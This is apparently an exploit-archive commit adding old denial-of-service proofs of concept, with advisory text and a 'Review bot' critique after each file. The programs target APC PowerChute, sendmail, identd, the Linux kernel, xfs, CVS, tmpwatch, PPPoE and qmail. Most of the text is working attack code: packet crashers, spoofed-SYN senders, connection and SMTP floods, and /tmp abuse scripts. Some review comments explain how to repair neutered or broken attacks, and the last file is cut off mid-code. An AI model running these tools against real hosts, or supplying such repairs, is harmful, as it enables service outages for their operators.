APC PowerChute PLUS is a software package that will safely shutdown computer systems locally or accross a network when UPS power starts to fail. When operating PowerChute PLUS normally listens to TCP ports 6547 and 6548, as well as for broadcast requests in UDP port 6549.
A request packet can be craftted and sent to the UDP port such that the upsd server will crash. This is been tested in the Solaris i386 version of the product.
It has also been reported the software will crash in some instances when port scanned.
It seems you can also manage any APC UPS remotely without providing any credential if you have the APC client software.
Both the client and server software also create files insecurely in /tmp. The pager script (dialpager.sh) also contains unsafe users of temporary files. The mailer script (mailer.sh) passes the files provided in the command line to rm without checking them.
----- begin downupsd.c -----
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
int main(int argc, char **argv) {
int s;
long on=1;
size_t addrsize;
char buffer[256];
struct sockaddr_in toaddr, fromaddr;
struct hostent h_ent;
if(argc!=2) {
fprintf(stderr, "Usage:\n\t%s <hostname running upsd>\n", argv[0]);
exit(0);
}
s = socket(AF_INET,SOCK_DGRAM,0);
setsockopt(s, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on));
printf("Crashing upsd on host's subnet: %s\n", argv[1]);
toaddr.sin_family = AF_INET;
toaddr.sin_port = htons(0);
toaddr.sin_addr.s_addr = 0x00000000;
bind(s, (struct sockaddr *)&toaddr, sizeof(struct sockaddr_in));
toaddr.sin_port = htons(6549);
memcpy((char *)&h_ent, (char *)gethostbyname(argv[1]), sizeof(h_ent));
memcpy(&toaddr.sin_addr.s_addr, h_ent.h_addr, sizeof(struct in_addr));
toaddr.sin_addr.s_addr |= 0xff000000;
strcpy(buffer, "027|1|public|9|0|0|2010~|0\0");
sendto(s, buffer, 256, 0, (struct sockaddr *)&toaddr,
sizeof(struct sockaddr_in));
printf("Crashed...\n");
close(s);
}
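Review bot: `memcpy((char *)&h_ent, (char *)gethostbyname(argv[1]), sizeof(h_ent))` dereferences a NULL pointer when the name does not resolve; check the return value first (and there is no need to copy the `hostent` at all, `h->h_addr` can be used directly). `sendto(s, buffer, 256, ...)` transmits the whole 256-byte stack buffer although `strcpy` wrote only the short probe string, so the remainder of uninitialised stack goes out with every packet; send `strlen(buffer)+1`, or `memset` the buffer first, unless the trailing bytes are part of the trigger, in which case a comment should say so. `toaddr.sin_addr.s_addr |= 0xff000000` assumes a little-endian host and a /24 network to form the directed broadcast (it sets the last octet to 255 only because `s_addr` is in network byte order on a little-endian machine); `htonl(INADDR_BROADCAST)` or an explicit subnet argument would make the intent portable. `<string.h>` is missing for `strcpy`/`memcpy`, and `fromaddr`/`addrsize` are unused.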
------- end downupsd.c -----

341
platforms/linux/dos/19282.c Executable file
@ -0,0 +1,341 @@
source: http://www.securityfocus.com/bid/363/info
The 2.0.x kernels have a quirk in the TCP implementation that have to do with the accept() call returning after only a syn has been recieved (as opposed to the three way handshake having been completed). Sendmail, which is compiled on many unices, makes the assumption that the three way handshake has been completed and a tcp connection has been fully established. This trust in a standard tcp implementation is seen in the following section of code <src/daemon.c>:
t = accept(DaemonSocket,
(struct sockaddr *)&RealHostAddr, &lotherend);
if (t >= 0 || errno != EINTR)
break;
}
savederrno = errno;
(void) blocksignal(SIGALRM);
if (t < 0)
{ errno = savederrno;
syserr("getrequests: accept");
/* arrange to re-open the socket next time around */
(void) close(DaemonSocket);
DaemonSocket = -1;
refusingconnections = TRUE;
sleep(5);
continue;
}
It's possible to cause a denial of service here if a RST is sent after the initial SYN to the sendmail smtpd on port 25. If that were to be done, the sendmail smtpd would be caught in a loop (above) accepting, testing the socket [yes, the one which accept returned on listening on port 25], sleeping, and closing the socket for as long as the syns and following rsts are sent. It is also completely possible to do this with spoofed packets.
/*
* smad.c - sendmail accept dos -
*
* Salvatore Sanfilippo [AntireZ]
* Intesis SECURITY LAB Phone: +39-2-671563.1
* Via Settembrini, 35 Fax: +39-2-66981953
* I-20124 Milano ITALY Email: antirez@seclab.com
* md5330@mclink.it
*
* compile it under Linux with gcc -Wall -o smad smad.c
*
* usage: smad fakeaddr victim [port]
*/
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#define SLEEP_UTIME 100000 /* modify it if necessary */
#define PACKETSIZE (sizeof(struct iphdr) + sizeof(struct tcphdr))
#define OFFSETTCP (sizeof(struct iphdr))
#define OFFSETIP (0)
u_short cksum(u_short *buf, int nwords)
{
unsigned long sum;
u_short *w = buf;
for (sum = 0; nwords > 0; nwords-=2)
sum += *w++;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return ~sum;
}
void resolver (struct sockaddr * addr, char *hostname, u_short port)
{
struct sockaddr_in *address;
struct hostent *host;
address = (struct sockaddr_in *)addr;
(void) bzero((char *)address, sizeof(struct sockaddr_in));
address->sin_family = AF_INET;
address->sin_port = htons(port);
address->sin_addr.s_addr = inet_addr(hostname);
if ( (int)address->sin_addr.s_addr == -1) {
host = gethostbyname(hostname);
if (host) {
bcopy( host->h_addr,
(char *)&address->sin_addr,host->h_length);
} else {
perror("Could not resolve address");
exit(-1);
}
}
}
int main(int argc, char **argv)
{
char runchar[] = "|/-\\";
char packet[PACKETSIZE],
*fromhost,
*tohost;
u_short fromport = 3000,
toport = 25;
struct sockaddr_in local, remote;
struct iphdr *ip = (struct iphdr*) (packet + OFFSETIP);
struct tcphdr *tcp = (struct tcphdr*) (packet + OFFSETTCP);
struct tcp_pseudohdr
{
struct in_addr saddr;
struct in_addr daddr;
u_char zero;
u_char protocol;
u_short lenght;
struct tcphdr tcpheader;
}
pseudoheader;
int sock, result, runcharid = 0;
if (argc < 3)
{
printf("usage: %s fakeaddr victim [port]\n", argv[0]);
exit(0);
}
if (argc == 4)
toport = atoi(argv[3]);
bzero((void*)packet, PACKETSIZE);
fromhost = argv[1];
tohost = argv[2];
resolver((struct sockaddr*)&local, fromhost, fromport);
resolver((struct sockaddr*)&remote, tohost, toport);
sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sock == -1) {
perror("can't get raw socket");
exit(1);
}
/* src addr */
bcopy((char*)&local.sin_addr, &ip->saddr,sizeof(ip->saddr));
/* dst addr */
bcopy((char*)&remote.sin_addr,&ip->daddr,sizeof(ip->daddr));
ip->version = 4;
ip->ihl = sizeof(struct iphdr)/4;
ip->tos = 0;
ip->tot_len = htons(PACKETSIZE);
ip->id = htons(getpid() & 255);
/* no flags */
ip->frag_off = 0;
ip->ttl = 64;
ip->protocol = 6;
ip->check = 0;
tcp->th_dport = htons(toport);
tcp->th_sport = htons(fromport);
tcp->th_seq = htonl(32089744);
tcp->th_ack = htonl(0);
tcp->th_off = sizeof(struct tcphdr)/4;
/* 6 bit reserved */
tcp->th_flags = TH_SYN;
tcp->th_win = htons(512);
/* start of pseudo header stuff */
bzero(&pseudoheader, 12+sizeof(struct tcphdr));
pseudoheader.saddr.s_addr=local.sin_addr.s_addr;
pseudoheader.daddr.s_addr=remote.sin_addr.s_addr;
pseudoheader.protocol = 6;
pseudoheader.lenght = htons(sizeof(struct tcphdr));
bcopy((char*) tcp, (char*) &pseudoheader.tcpheader,
sizeof(struct tcphdr));
/* end */
tcp->th_sum = cksum((u_short *) &pseudoheader,
12+sizeof(struct tcphdr));
/* 16 bit urg */
while (0)
{
result = sendto(sock, packet, PACKETSIZE, 0,
(struct sockaddr *)&remote, sizeof(remote));
if (result != PACKETSIZE)
{
perror("sending packet");
exit(0);
} printf("\b");
printf("%c", runchar[runcharid]);
fflush(stdout);
runcharid++;
if (runcharid == 4)
runcharid = 0;
usleep(SLEEP_UTIME);
}
return 0;
}
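Review bot: the send loop is `while (0)`, so the program as committed builds the packet and exits without ever calling `sendto`; nothing is sent. If it was neutered on purpose a header comment should say so, otherwise it should read `while (1)` (the `runchar` spinner and `usleep(SLEEP_UTIME)` only make sense in an endless loop). The code also does not do what the description says: the text explains that a RST following the SYN is what traps `sendmail` in the accept/close/sleep loop, but the packet sets only `TH_SYN` and no RST is ever built, so the described SYN-then-RST sequence from the spoofed source is incomplete. `cksum()` treats `nwords` as a byte count (`nwords -= 2` per 16-bit word), so the parameter is misnamed, and the pseudo-header field `lenght` is a typo for `length`; both are cosmetic but worth cleaning up if the file is kept.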

109
platforms/linux/dos/19463.c Executable file
@ -0,0 +1,109 @@
source: http://www.securityfocus.com/bid/587/info
In the inetd.conf under certain distributions of SuSE Linux the in.identd daemon is started with the -w -t120 option. This means that one identd process waits 120 seconds after answering the first request to answer the next request. If a malicious remote attacker starts a large number of ident requests in a short period of time it will force the target machine to start multiple daemons because the initial daemon is in a time wait state. This can eventually lead the machine to starve itself of memory resulting essentially in a machine halt.
/* susekill.c by friedolin
*
* used to kill lame SuSE Linux boxes with identd running
* identd must be started with -w -t120 to crash a machine
*
* have fun, friedolin <hendrik@scholz.net>
*
* based on gewse.c by napster
*/
/* Tested systems:
*
* vulnerable:
*
* SuSE-Linux 4.4 - 6.2
* Slackware 3.2 and 3.6
*
* not vulnerable:
*
* RedHat 5.0 - 6.0
* Debian 2.0 - 2.1
*
* not tested:
*
* pre 4.3 SuSE systems
* pre 5.0 RedHat
* pre 2.0 Debian
* other Slackware releases
* Caldera Open Linux, ...
*
* please send me your results and experiences !
*
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <netdb.h>
#define GETIDENT "1027, 6667 : USERID : UNIX : killsuse"
int sockdesc;
int portkill;
int numkill;
int x;
void usage(char *progname)
{
printf("susekill by friedolin (based on gewse.c)\n");
printf("usage: %s <host> <# of connections>\n",progname);
exit(69);
}
main(int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *he;
if (argc<3) usage(argv[0]);
sin.sin_port = htons(113);
sin.sin_family = AF_INET;
he = gethostbyname(argv[1]);
if (he) {
sin.sin_family = AF_INET;
sin.sin_port = htons(113);
memcpy((caddr_t)&sin.sin_addr.s_addr, he->h_addr, he->h_length);
} else {
perror("resolving");
}
numkill = atoi(argv[2]);
printf("Flooding %s [%s] identd %d times.\n", argv[1], inet_ntoa(sin.sin_addr.s_addr), numkill);
printf("Killing");
fflush(stdout);
for (x=1;x<=numkill;x++) {
sockdesc = socket(AF_INET, SOCK_STREAM, 0);
if (sockdesc < 0) {
perror("socket");
exit(69);
}
if (connect(sockdesc, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
perror("connect");
exit(69);
}
printf(" .");
fflush(stdout);
(void) write(sockdesc, GETIDENT, strlen(GETIDENT));
}
printf("\n");
}
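Review bot: `inet_ntoa(sin.sin_addr.s_addr)` passes an `in_addr_t` where `inet_ntoa()` takes a `struct in_addr`, and `<arpa/inet.h>` is not included, so the file fails to compile with a conforming compiler; use `inet_ntoa(sin.sin_addr)` and add the header. When `gethostbyname()` fails the code prints `perror("resolving")` and carries on with `sin.sin_addr` uninitialised; it should `exit()` there. `main` has no return type, and the `sin_family`/`sin_port` assignments are duplicated before and inside the `if (he)` branch. Leaving the `numkill` sockets open is presumably intentional (each open connection keeps an `identd -w` instance alive), but a comment saying so would stop someone 'fixing' it with a `close()`.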

24
platforms/linux/dos/19701.sh Executable file
@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/904/info
There is a low-bandwidth dos vulnerability in Sendmail. When a client connects to the sendmail smtpd and sends an ETRN command to the server, the server fork()s and sleeps for 5 seconds. If many ETRN commands are sent to a server, it is possible to exhaust system resources and cause a denial of service or even a reboot of the server.
#!/bin/sh
TARGET=localhost
COUNT=150
SLEEP=1
echo "gurghfrbl.sh - (c) lcamtuf '99"
echo -n "Tickle"
while :; do
echo -n "."
(
NIC=0
while [ "$NIC" -lt "$COUNT" ]; do
echo "ETRN x"
done
) | telnet $TARGET 25 &>/dev/null &
sleep $SLEEP
killall -9 telnet &>/dev/null
done
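Review bot: the inner loop never terminates on its own: `NIC=0` is set but never incremented, so `while [ "$NIC" -lt "$COUNT" ]` is always true and `COUNT=150` has no effect; the burst only ends when the outer loop's `killall -9 telnet` tears the pipe down a second later. Either add `NIC=$((NIC+1))` inside the loop or drop `COUNT`. `&>/dev/null` is a bash redirection, not POSIX `sh`, so under the `#!/bin/sh` shebang a strict `sh` will not redirect (use `>/dev/null 2>&1`). `killall -9 telnet` also kills every telnet process on the attacking host, not just the ones this script spawned; keeping `$!` and killing that PID would be safer.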

27
platforms/linux/dos/19818.c Executable file
@ -0,0 +1,27 @@
source: http://www.securityfocus.com/bid/1072/info
A denial of service exists in Linux kernels, as related to Unix domain sockets ignoring limits as set in /proc/sys/net/core/wmem_max. By creating successive Unix domain sockets, it is possible to cause a denial of service in some versions of the Linux kernel. Versions 2.2.12, 2.2.14, and 2.3.99-pre2 have all been confirmed as being vulnerable. Previous kernel versions are most likely vulnerable.
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>
char buf[128 * 1024];
int main ( int argc, char **argv )
{
struct sockaddr SyslogAddr;
int LogFile;
int bufsize = sizeof(buf)-5;
int i;
for ( i = 0; i < bufsize; i++ )
buf[i] = ' '+(i%95);
buf[i] = '\0';
SyslogAddr.sa_family = AF_UNIX;
strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_data) );
LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 );
sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr) );
return 0;
}
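Review bot: the description and the code disagree: the text says the DoS comes from 'creating successive Unix domain sockets', but the program opens a single `SOCK_DGRAM` socket and sends one ~128 KB datagram to `/dev/log`; if the bug is that the kernel accepts a datagram far larger than `wmem_max`, the description should say that, and a loop would be needed for the 'successive' variant. The return value of `sendto()` is discarded, so on a kernel that enforces the limit the PoC exits 0 as if it had succeeded; check the result and `perror()` it. The `-5` in `sizeof(buf)-5` is unexplained. `SyslogAddr` is a generic `struct sockaddr` with `sa_data` written by `strncpy`; `struct sockaddr_un` with `sun_path` (and `<sys/un.h>`) is the correct type for a Unix-domain address and makes the path length limit explicit.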

31
platforms/linux/dos/19850.c Executable file
@ -0,0 +1,31 @@
source: http://www.securityfocus.com/bid/1111/info
A denial of service exists in the X11 font server shipped with RedHat Linux 6.x. Due to improper input validation, it is possible for any user to crash the X fontserver. This will prevent the X server from functioning properly.
Additional, similar problems exist in the stock xfs. Users can crash the font server remotely, and potential exists for buffer overruns. The crux of the problem stems from the font server being lax about verifying network input. While no exploits exist, it is likely they are available in private circles, and can result in remote root compromise.
#include <sys/socket.h>
#include <sys/un.h>
#define CNT 50
#define FS "/tmp/.font-unix/fs-1"
int s,y;
struct sockaddr_un x;
char buf[CNT];
main() {
for (y;y<2;y++) {
s=socket(PF_UNIX,SOCK_STREAM,0);
x.sun_family=AF_UNIX;
strcpy(x.sun_path,FS);
if (connect(s,&x,sizeof(x))) { perror(FS); exit(1); }
if (!y) write(s,"lK",2);
memset(buf,'A',CNT);
write(s,buf,CNT);
shutdown(s,2);
close(s);
}
}
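Review bot: the file needs `<stdio.h>`, `<stdlib.h>`, `<string.h>` and `<unistd.h>` for `perror`, `exit`, `strcpy`/`memset` and `write`/`close`; `connect(s,&x,...)` passes a `struct sockaddr_un *` where `struct sockaddr *` is expected without a cast, and `main()` has no return type. The path `/tmp/.font-unix/fs-1` and the two-byte prefix `"lK"` sent only on the first pass are the whole substance of the trigger, yet neither is commented: say which xfs configuration the socket path assumes and what `"lK"` is meant to be (a connection-setup header, a byte-order marker, or arbitrary bytes). Without that a reader cannot tell whether the crash needs those specific bytes or just the 50 `'A'`s after them.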

16
platforms/linux/dos/19870.pl Executable file
@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/1136/info
CVS stands for Concurrent Versions Software and is an open-source package designed to allow multiple developers to work concurrently on a single source tree, recording changes and controlling versions. It is possible to cause a denial of service for users of CVS due to predictable temporary filenames. CVS uses locking directories in /tmp and combines the static string 'cvs-serv' with the process ID to use as filenames. This is trivial to guess for an attacker, and since /tmp is world writeable, directories can be created with predicted names. CVS drops root priviliges, so these directories cannot be overwritten and every session for which a locking directory has been already created (by the attacker) will be broken.
The following perl script will create many directories in /tmp with incrementing pids:
#!/usr/bin/perl
$min=400;
$max=4000;
for ($x=$min;$x<=$max;$x++) {
open CVSTMP, ">>/tmp/cvs-serv$x" or die "/tmp/cvs-serv$x: $!";
chmod 0600, "/tmp/cvs-serv$x";
close CVSTMP;
}
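Review bot: the text says the script 'will create many directories', and the attack as described relies on pre-creating the directory names CVS will try to `mkdir`, but the code creates regular files (`open CVSTMP, ">>/tmp/cvs-serv$x"`), not directories. A file at that path also makes CVS's `mkdir` fail with EEXIST, so it probably still works, but the PoC should match its description: use `mkdir "/tmp/cvs-serv$x", 0700 or die ...` and drop the `chmod`. The PID window `400..4000` is arbitrary; a comment noting that it should bracket the PIDs the server is expected to fork at would help.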

137
platforms/linux/dos/20217.c Executable file
@ -0,0 +1,137 @@
source: http://www.securityfocus.com/bid/1664/info
Any user with write access to /tmp or /var/tmp, can induce tmpwatch to cause Red Hat (and others runnng tmpwatch from cron) to stop responding, and possibly require a hard reboot. This is accomplished by creating a directory tree many (ie. ~6000) nodes deep in /tmp. For each level of the directory in /tmp, tmpwatch will fork() a new copy of itself.
Red Hat affected versions:
Red Hat Linux 7.0 (tmpwatch v.2.5.1)
Red Hat Linux 6.2 (tmpwatch v.2.2)
Note:
(excerpted from Internet Security Systems Security Advisory)
"Source code comparison between the Red Hat Linux 6.2 and 7.0 tmpwatch packages
suggests this vulnerability was recognized and a fix was attempted. However,
the fix is incorrect, and the vulnerability is still exploitable.
Do not use the --fuser or -s options with tmpwatch."
---START---cut---:a.c (mode 644)
//
// make lots of directories.
// ./a <#of-dirs>
// ./a with no arguments to delete dirs.
main(int argc,char *argv[])
{
int c=0,d=0;
if (argc!=2)
{
while(!chdir("./A"))c++;
chdir("..");
printf("c=%d removing\n",c);
while(!rmdir("./A")) {chdir("..");c--;}
if(c)printf("erm. bad thing.\n");
}
else
{
c=atoi(argv[1]);
printf("c=%d making.\n",c);
while(c--)
{
mkdir("./A",0777);
chdir("./A");
}
}
}
--END---cut-----:a.c
# ./testscript
(code follows)
---START---cut---:testscript (mode 755)
#!/bin/sh
# clear the previous stuff.
./a
rm ./timer.results
touch timer.results
# create a 1 deep
./a 1 >>timer.results
time tmpwatch 240 . 2>>timer.results
# create a 100 deep
./a 100 >>timer.results
time tmpwatch 240 . 2>>timer.results
# create a 200 deep
./a 200 >>timer.results
time tmpwatch 240 . 2>>timer.results
# create a 300 deep
./a 300 >>timer.results
time tmpwatch 240 . 2>>timer.results
# create a 400 deep
./a 400 >>timer.results
time tmpwatch 240 . 2>>timer.results
# create a 500 deep
./a 500 >>timer.results
time tmpwatch 240 . 2>>timer.results
# create a 600 deep
./a 600 >>timer.results
time tmpwatch 240 . 2>>timer.results
#tidy up.
./a >>timer.results
--END---cut-----:testscript
If you don't want to test it manually, here you will find the results on
the tests on my machine. Who says u need an Athlon with cable or DSL. I
say "Well, it would be nice. Real nice." I also think this program would
probably die faster and more spectacularly on a fast machine with a huge
amount of memory and swap space. Oh yeah. Save anything important. And you
have to run it as root. (I think. Should probably thought of that. I'll
remember it for next time.) The crontab is an effective way of getting it
run as root. Which it wants to do anyway. At about 4am everyday.
--START---cut---:timer.results (mode 644)
c=1 making.
0.00user 0.01system 0:00.00elapsed 125%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (96major+58minor)pagefaults 0swaps
c=100 making.
0.01user 0.19system 0:00.19elapsed 100%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (96major+1797minor)pagefaults 0swaps
c=200 making.
0.07user 0.40system 0:00.49elapsed 94%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (96major+3554minor)pagefaults 0swaps
c=300 making.
0.10user 0.66system 0:00.76elapsed 99%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (96major+5308minor)pagefaults 0swaps
c=400 making.
0.13user 1.33system 0:11.80elapsed 12%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (11766major+9445minor)pagefaults 1263swaps
c=500 making.
0.15user 2.11system 0:22.38elapsed 10%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (14104major+13238minor)pagefaults 2699swaps
c=600 making.
0.21user 2.81system 0:32.61elapsed 9%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (26066major+17781minor)pagefaults 4109swaps
c=600 removing
c=600 making.
0.11user 2.88system 0:36.14elapsed 8%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (25741major+17567minor)pagefaults 4009swaps
c=700 making.
0.20user 4.24system 0:45.95elapsed 9%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (35562major+22180minor)pagefaults 5542swaps
c=800 making.
Command terminated by signal 2
0.00user 0.00system 6:01.87elapsed 0%CPU (0avgtext+0avgdata 0maxresident)k
0inputs+0outputs (102major+18minor)pagefaults 10swaps
--END---cut-----:timer.results
(System is Cyrix-6x86 @ 187 MHz, 32M physical ram, 64M swap.)
(^C was pressed after about a minute into the 800 deep one. Several system
programs died due to memory starvation. It took a quite a while afterwards
before the console regained any usabilty. When i tried to run startx, it
refused to start. xfs had died. everything looked odd. slow motion. i
think it was because of the loadavg)
# uptime
9:00pm up 2:14, 2 users, load average: 202.28, 363.68, 186.46
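Review bot: `a.c` will not build cleanly as shipped: `main`, `chdir`, `rmdir`, `mkdir`, `atoi` and `printf` are used with no `#include`s and no return type, so add `<stdio.h>`, `<stdlib.h>`, `<unistd.h>` and `<sys/stat.h>` and declare `int main(...)`. The recorded results do not come from the committed `testscript`: the script stops at `./a 600`, yet `timer.results` contains `c=600 removing`, a second `c=600 making`, `c=700 making` and `c=800 making`, so either the script that produced the numbers had extra steps or the results were appended by hand; the file should say which. The remark that it 'has to run as root' is stated as a guess ('I think'); running `time tmpwatch 240 .` against a directory the user owns does not itself need root, only the cron-driven real-world case does, and that distinction is worth one sentence. The unchecked `mkdir("./A",0777)`/`chdir("./A")` in the creation loop also means a failure part-way silently leaves a shallower tree than requested.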

42
platforms/linux/dos/20494.pl Executable file
@ -0,0 +1,42 @@
source: http://www.securityfocus.com/bid/2098/info
Roaring Penguin Software's PPPoE is a freeware PPP over Ethernet client often used by ADSL subscribers running Linux or NetBSD.
PPPoE contains a possibly remotely exploitable denial of service vulnerability in its handling of TCP packets when the Clamp_MSS option is used. If PPPoE recieves a malformed TCP packet with a "zero-length option", PPPoE will go into an infinite loop. As a result, the ppp connection being supported by PPPoE will time out and be terminated. A manual re-start is needed to regain functionality.
This bug has been fixed by Roaring Penguin Software in a new version, see the solutions section.
#!/usr/bin/perl
# POC script that causes a DoS in an PPP-over-Ethernet Link, in RedHat 7.0.
# Advisory: http://www.redhat.com/support/errata/RHSA-2000-130.html
# by dethy
use Net::RawIP;
use Getopt::Std;
getopts('d:s:p:c',\%args) || &usage;
if(defined($args{d})){$daddr=$args{d};}else{&usage;}
if(defined($args{s})){$src=$args{s};}else{$src=&randsrc;}
if(defined($port{p})){$port=$args{p};}else{&usage;}
if(defined($args{c})){$count=$args{c};}else{$count=10;}
sub randport(){
srand;
return $sport=(int rand 65510);
}
sub randsrc(){
srand;
return $saddr=(int rand 255).".".(int rand 255).".".(int rand 255).".".(int rand 255);
}
$packet = new Net::RawIP({ip=>{},tcp=>{}});
$packet->set({ ip => { saddr => $src,
daddr => $daddr,
tos => 3 },
tcp => { source => $sport,
dest => $port,
syn => 1, psh => 1 } });
$packet->send(0,$count);
sub usage(){ die("pppoe-link POC DoS on RH7\n$0 -d <dest> -s <source> -p <port> -c <count>\n"); }
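Review bot: the script cannot run as written. `if(defined($port{p}))` tests a hash `%port` that is never populated, so `-p` is always treated as missing and `&usage` dies; it should be `$args{p}`. `getopts('d:s:p:c', ...)` declares `-c` as a flag with no argument, yet `$args{c}` is used as the packet count; the spec should be `'d:s:p:c:'`. `randport()` is defined but never called, so `$sport` is `undef` when the packet is built (`source => $sport`); call it or take a source-port option. The `srand;` calls are redundant and `randsrc` can yield addresses such as `0.x.x.x` or `255.x.x.x`. More importantly, the description says the trigger is a TCP packet with a 'zero-length option' under `Clamp_MSS`, but the packet built here carries no TCP options at all (`syn => 1, psh => 1` only), so the PoC does not emit the malformed packet the text describes; the option bytes have to be supplied, and the file should show them.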

7
platforms/linux/dos/20535.txt Executable file
@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/2180/info
ReiserFS is a file system alternative to the Linux ext2 file system. It was originally written by Hans Reiser, and is freely available and publicly maintained.
A problem has been reported in the handling of long file names with ReiserFS version 3.5.28 on SuSE Linux distribution 7.0. It is possible to create a directory with a long file name (the initial example displayed a directory with 768 characters), then attempt to list the file system using system binary ls or with built in shell function echo and create a Denial of Service. Upon attempting to list or echo the contents of the filesystem, a kernel buffer overflow occurs, overwriting variables on the stack including possibly the return address, as well as crashing the system. It may be possible for a malicious user to execute arbitrary code, deny service to legitimate users, and potentially break out of a chroot environment. This vulnerability is yet unverified.
mkdir "$(perl -e 'print "x" x 768')"
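Review bot: the PoC stops at creating the directory, but the description says the overflow happens when the directory is listed with `ls` or expanded by the shell with `echo`, so the trigger step is missing; add the listing command after the `mkdir`, and state that the directory must be created on a ReiserFS 3.5.28 mount, since the bug is in the filesystem's long-name handling and not in `mkdir` itself. The description also calls the issue "yet unverified", which belongs next to the command so a reader does not take a clean `mkdir` as confirmation.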

35
platforms/linux/dos/20561.pl Executable file

@ -0,0 +1,35 @@
source: http://www.securityfocus.com/bid/2237/info
qmail is an e-mail server package developed by Dan Bernstein.
The qmail smtp server is subject to a denial of service. By specifying a large number of addresses in the recipient field (RCPT), qmail will stop responding.
This behaviour is due to the dynamically allocated memory being exhausted.
The condition occurs in situations where resource limits are not imposed on the server process.
Many systems may be running qmail without resource limits. The existence of working exploit code poses a threat to these vulnerable qmail servers.
Once affected, a restart of the qmail smtp service is required in order to gain normal functionality.
It should be noted that this type of threat is not limited to qmail. Resource exhaustion attacks can be used against many internet services by remote attackers.
#!/usr/local/bin/perl -w
# $Id: qmail.pl,v 1.4 1997/06/12 02:12:42 super Exp $
require 5.002;
use strict;
use Socket;
if(!($ARGV[0])){print("usage: $0 FQDN","\n");exit;}
my $port = 25; my $proto = getprotobyname("tcp");
my $iaddr = inet_aton($ARGV[0]) || die "No such host: $ARGV[0]";
my $paddr = sockaddr_in($port, $iaddr);
socket(SKT, AF_INET, SOCK_STREAM, $proto) || die "socket() $!";
connect(SKT, $paddr) && print("Connected established.\n") || die "connect() $!";
send(SKT,"mail from: <me\@me>\n",0) || die "send() $!";
my $infstr = "rcpt to: <me\@" . $ARGV[0] . ">\n"; print("Attacking..","\n");
while(<SKT>){
send(SKT,$infstr,0) || die "send() $!";
}
die "Connection lost!";
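Review bot: the `while(<SKT>)` loop sends the next `rcpt to:` on every line it reads without looking at the SMTP reply code, so the script cannot tell a server that keeps accepting recipients (the memory-exhaustion case the description relies on) from one that is rejecting them with 4xx/5xx replies; it will hammer a patched or resource-limited server until the connection drops. Parse the three-digit code at the start of `$_` and stop when it is not 2xx, as the C version of this PoC (20562.c, later in this commit) does with `atoi(buf) / 100 != 2`. Lines are also terminated with a bare `\n`; SMTP specifies CRLF, so `\r\n` is the safer choice. Note for readers that the recipient domain is the command-line hostname, so the target must accept mail for that name or every RCPT will be refused.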

92
platforms/linux/dos/20562.c Executable file

@ -0,0 +1,92 @@
source: http://www.securityfocus.com/bid/2237/info
qmail is an e-mail server package developed by Dan Bernstein.
The qmail smtp server is subject to a denial of service. By specifying a large number of addresses in the recipient field (RCPT), qmail will stop responding.
This behaviour is due to the dynamically allocated memory being exhausted.
The condition occurs in situations where resource limits are not imposed on the server process.
Many systems may be running qmail without resource limits. The existence of working exploit code poses a threat to these vulnerable qmail servers.
Once affected, a restart of the qmail smtp service is required in order to gain normal functionality.
It should be noted that this type of threat is not limited to qmail. Resource exhaustion attacks can be used against many internet services by remote attackers.
/*
* qmail-dos-2 - run a qmail system out of swap space by feeding an infinite
* amount of recipients.
*
* Usage: qmail-dos-2 fully-qualified-hostname
*
* Author: Wietse Venema. The author is not responsible for abuse of this
* program. Use at your own risk.
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdarg.h>
#include <errno.h>
#include <stdio.h>
void fatal(char *fmt,...)
{
va_list ap;
va_start(ap, fmt);
vfprintf(stderr, fmt, ap);
va_end(ap);
putc('\n', stderr);
exit(1);
}
chat(FILE * fp, char *fmt,...)
{
char buf[BUFSIZ];
va_list ap;
fseek(fp, 0L, SEEK_SET);
va_start(ap, fmt);
vfprintf(fp, fmt, ap);
va_end(ap);
fputs("\r\n", fp);
if (fflush(fp))
fatal("connection lost");
fseek(fp, 0L, SEEK_SET);
if (fgets(buf, sizeof(buf), fp) == 0)
fatal("connection lost");
if (atoi(buf) / 100 != 2)
fatal("%s", buf);
}
int main(int argc, char **argv)
{
struct sockaddr_in sin;
struct hostent *hp;
char buf[BUFSIZ];
int sock;
FILE *fp;
if (argc != 2)
fatal("usage: %s host", argv[0]);
if ((hp = gethostbyname(argv[1])) == 0)
fatal("host %s not found", argv[1]);
memset((char *) &sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
memcpy((char *) &sin.sin_addr, hp->h_addr, sizeof(sin.sin_addr));
sin.sin_port = htons(25);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
fatal("socket: %s", strerror(errno));
if (connect(sock, (struct sockaddr *) & sin, sizeof(sin)) < 0)
fatal("connect to %s: %s", argv[1], strerror(errno));
if ((fp = fdopen(sock, "r+")) == 0)
